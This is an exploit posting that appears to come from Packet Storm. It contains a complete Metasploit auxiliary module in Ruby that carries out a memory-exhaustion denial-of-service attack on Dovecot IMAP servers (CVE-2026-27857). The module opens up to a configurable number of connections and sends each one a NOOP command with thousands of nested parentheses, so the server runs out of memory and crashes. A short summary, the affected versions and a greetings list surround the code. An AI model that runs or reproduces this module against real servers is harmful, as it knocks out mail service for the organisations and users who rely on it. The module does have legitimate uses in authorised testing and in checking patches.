## https://sploitus.com/exploit?id=PACKETSTORM:219556
==================================================================================================================================
| # Title : Dovecot IMAP NOOP Command Memory Exhaustion Denial of Service |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.dovecotpro.com/ |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets a memory exhaustion vulnerability in the Dovecot IMAP service.
It opens multiple concurrent TCP connections and sends specially crafted NOOP commands containing deeply nested parentheses to force excessive memory allocation on the server.
By sustaining these connections for a configurable duration, the module attempts to exhaust system memory, potentially leading to service instability or crash.
It is classified as a denial-of-service (DoS) attack affecting specific Dovecot versions.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Dovecot IMAP NOOP Command Memory Exhaustion DoS',
'Description' => %q{
Dovecot imap-login service is vulnerable to memory exhaustion through specially
crafted NOOP commands. Sending a NOOP command with 4000 nested parentheses
causes ~1MB of memory allocation per connection. By opening multiple connections
without sending the terminating LF, an attacker can cause memory exhaustion
leading to service crash.
An attacker can create 1000 connections to allocate 1GB of memory, triggering
VSZ limit and killing the process along with its proxied connections.
Affects Dovecot Pro core 2.3.0+, Dovecot Pro core 3.1.0+, Dovecot CE core 2.4.0+.
Fixed in versions 2.4.3, 3.0.5, 3.1.4, and 2.3.22.1.
},
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-27857'],
['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
['CWE', '400']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2026-03-27'
)
)
register_options([
Opt::RPORT(143),
OptInt.new('THREADS', [true, 'Number of concurrent connections', 100]),
OptInt.new('PARENTHESIS_DEPTH', [true, 'Number of nested parentheses', 4000]),
OptInt.new('DURATION', [true, 'Duration of attack in seconds', 30])
])
end
def run
print_status("Dovecot IMAP NOOP Memory Exhaustion DoS (CVE-2026-27857)")
print_status("Target: #{peer}")
threads = []
start_time = Time.now
print_status("Starting DoS attack with #{datastore['THREADS']} threads...")
datastore['THREADS'].times do |i|
threads << framework.threads.spawn("DovecotDoS-#{i}", false) do
attack_connection
end
end
while (Time.now - start_time) < datastore['DURATION']
sleep(5)
print_status("Attack ongoing... (#{(Time.now - start_time).round}/#{datastore['DURATION']}s)")
end
print_status("Stopping attack...")
threads.each(&:kill)
print_status("Attack completed")
end
def attack_connection
sock = nil
begin
sock = connect
banner = sock.get_once
vprint_status("Connected, banner: #{banner}")
parentheses = "(" * datastore['PARENTHESIS_DEPTH']
parentheses += ")" * datastore['PARENTHESIS_DEPTH']
sock.put("a1 NOOP #{parentheses}\r\n")
sleep(datastore['DURATION'])
rescue ::Exception => e
vprint_error("Connection error: #{e.message}")
ensure
disconnect(sock) if sock
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================